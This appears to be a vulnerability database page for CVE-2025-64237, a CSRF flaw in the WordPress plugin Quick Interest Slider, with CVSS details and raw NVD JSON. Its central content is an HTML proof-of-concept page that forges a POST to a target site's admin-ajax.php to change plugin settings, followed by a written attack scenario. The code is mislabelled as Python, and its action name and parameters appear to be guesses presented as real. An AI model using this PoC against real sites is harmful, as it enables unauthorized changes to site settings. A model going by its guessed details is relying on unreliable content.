Security Vulnerability Report
中文
CVE-2025-64237 CVSS 4.3 MEDIUM

CVE-2025-64237

Published: 2025-12-16 09:15:53
Last Modified: 2026-04-27 16:16:36

Description

Cross-Site Request Forgery (CSRF) vulnerability in Graham Quick Interest Slider quick-interest-slider allows Cross Site Request Forgery.This issue affects Quick Interest Slider: from n/a through <= 3.1.5.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Quick Interest Slider <= 3.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-64237 --> <!-- This PoC demonstrates the CSRF vulnerability in Quick Interest Slider plugin --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2025-64237</title> </head> <body> <h1>CSRF PoC for Quick Interest Slider Plugin</h1> <p>Click the button below to trigger the CSRF attack:</p> <!-- Form that auto-submits to WordPress admin-ajax.php or admin-post.php --> <form id="csrfForm" action="http://target-site/wp-admin/admin-ajax.php" method="POST"> <!-- Add plugin-specific action and parameters --> <input type="hidden" name="action" value="quick_interest_slider_save_settings"> <input type="hidden" name="interest_rate" value="99.99"> <input type="hidden" name="min_amount" value="0"> <!-- Additional plugin parameters can be added here --> <button type="submit">Submit Malicious Request</button> </form> <script> // Auto-submit form when page loads // document.getElementById('csrfForm').submit(); console.log('CSRF PoC loaded. Form ready for submission.'); console.log('Target: Quick Interest Slider Plugin <= 3.1.5'); console.log('Vulnerability: Missing CSRF token validation'); </script> <h2>Attack Scenario:</h2> <ol> <li>Attacker creates this malicious page</li> <li>WordPress admin visits the page while logged in</li> <li>Browser automatically sends authenticated request</li> <li>Plugin processes request without CSRF validation</li> <li>Attacker successfully modifies plugin settings</li> </ol> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64237", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:53.110", "lastModified": "2026-04-27T16:16:36.233", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Graham Quick Interest Slider quick-interest-slider allows Cross Site Request Forgery.This issue affects Quick Interest Slider: from n/a through <= 3.1.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/quick-interest-slider/vulnerability/wordpress-quick-interest-slider-plugin-3-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}